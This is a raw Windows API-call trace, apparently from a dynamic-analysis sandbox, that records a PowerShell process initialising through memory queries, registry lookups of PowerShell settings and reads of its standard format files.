	[0338.367] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.788] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.788] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.790] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.792] VirtualQuery (in: lpAddress=0x1abda0, lpBuffer=0x1acc60, dwLength=0x30 | out: lpBuffer=0x1acc60*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.792] VirtualQuery (in: lpAddress=0x1abda0, lpBuffer=0x1acc60, dwLength=0x30 | out: lpBuffer=0x1acc60*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.792] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.793] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.817] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.817] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.817] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.213] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0339.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.213] CoTaskMemFree (pv=0x468180) 
	[0339.214] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.218] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.219] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.219] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.219] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.219] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.219] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.220] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.221] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.221] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad248 | out: phkResult=0x1ad248*=0x31c) returned 0x0
	[0339.221] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1ad25c, lpData=0x0, lpcbData=0x1ad258*=0x0 | out: lpType=0x1ad25c*=0x1, lpData=0x0, lpcbData=0x1ad258*=0x74) returned 0x0
	[0339.222] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1ad1cc, lpData=0x0, lpcbData=0x1ad1c8*=0x0 | out: lpType=0x1ad1cc*=0x1, lpData=0x0, lpcbData=0x1ad1c8*=0x74) returned 0x0
	[0339.222] CoTaskMemAlloc (cb=0x78) returned 0x41a0e0
	[0339.222] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1ad19c, lpData=0x41a0e0, lpcbData=0x1ad198*=0x74 | out: lpType=0x1ad19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad198*=0x74) returned 0x0
	[0339.222] CoTaskMemFree (pv=0x41a0e0) 
	[0339.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0339.222] SetErrorMode (uMode=0x1) returned 0x1
	[0339.222] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0339.222] SetErrorMode (uMode=0x1) returned 0x1
	[0339.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.223] SetErrorMode (uMode=0x1) returned 0x1
	[0339.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0339.223] SetErrorMode (uMode=0x1) returned 0x1
	[0339.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0339.223] SetErrorMode (uMode=0x1) returned 0x1
	[0339.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0339.224] SetErrorMode (uMode=0x1) returned 0x1
	[0339.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.224] SetErrorMode (uMode=0x1) returned 0x1
	[0339.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0339.224] SetErrorMode (uMode=0x1) returned 0x1
	[0339.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.224] SetErrorMode (uMode=0x1) returned 0x1
	[0339.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0339.224] SetErrorMode (uMode=0x1) returned 0x1
	[0339.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0339.225] SetErrorMode (uMode=0x1) returned 0x1
	[0339.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0339.225] SetErrorMode (uMode=0x1) returned 0x1
	[0339.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0339.225] SetErrorMode (uMode=0x1) returned 0x1
	[0339.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0339.226] SetErrorMode (uMode=0x1) returned 0x1
	[0339.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0339.226] SetErrorMode (uMode=0x1) returned 0x1
	[0339.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0339.226] SetErrorMode (uMode=0x1) returned 0x1
	[0339.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0339.226] SetErrorMode (uMode=0x1) returned 0x1
	[0339.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0339.226] SetErrorMode (uMode=0x1) returned 0x1
	[0339.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0339.227] SetErrorMode (uMode=0x1) returned 0x1
	[0339.227] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0339.227] SetErrorMode (uMode=0x1) returned 0x1
	[0339.227] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0339.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.227] CoTaskMemFree (pv=0x468180) 
	[0339.230] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0339.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.230] CoTaskMemFree (pv=0x468180) 
	[0339.230] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0339.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.230] CoTaskMemFree (pv=0x468180) 
	[0339.231] CoTaskMemAlloc (cb=0x104) returned 0x468180
	[0339.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x468180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.231] CoTaskMemFree (pv=0x468180) 
	[0339.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.231] SetErrorMode (uMode=0x1) returned 0x1
	[0339.231] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0339.231] GetFileType (hFile=0x2ec) returned 0x1
	[0339.231] SetErrorMode (uMode=0x1) returned 0x1
	[0339.232] GetFileType (hFile=0x2ec) returned 0x1
	[0339.232] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.233] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.233] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.234] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.234] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.234] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.234] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x9e2, lpOverlapped=0x0) returned 1
	[0339.235] ReadFile (in: hFile=0x2ec, lpBuffer=0x33c9f82, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33c9f82*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0339.235] ReadFile (in: hFile=0x2ec, lpBuffer=0x33caa38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x33caa38*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0339.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.235] SetErrorMode (uMode=0x1) returned 0x1
	[0339.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0339.235] SetErrorMode (uMode=0x1) returned 0x1
	[0339.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.236] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2ec) returned 0x0
	[0339.236] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0339.236] CoTaskMemAlloc (cb=0x5a) returned 0x1b814820
	[0339.236] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b814820, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0339.236] CoTaskMemFree (pv=0x1b814820) 
	[0339.236] RegCloseKey (hKey=0x2ec) returned 0x0
	[0339.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0339.239] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4ce16957, Data2=0x67fd, Data3=0x43a5, Data4=([0]=0xa6, [1]=0x9e, [2]=0x33, [3]=0x9, [4]=0xe6, [5]=0x6a, [6]=0x20, [7]=0x8e))) returned 0x0
	[0339.249] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xed8c8e42, Data2=0x13d6, Data3=0x4825, Data4=([0]=0xb2, [1]=0x5a, [2]=0x52, [3]=0xfc, [4]=0x16, [5]=0x14, [6]=0x35, [7]=0x6b))) returned 0x0
	[0339.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0339.251] SetErrorMode (uMode=0x1) returned 0x1
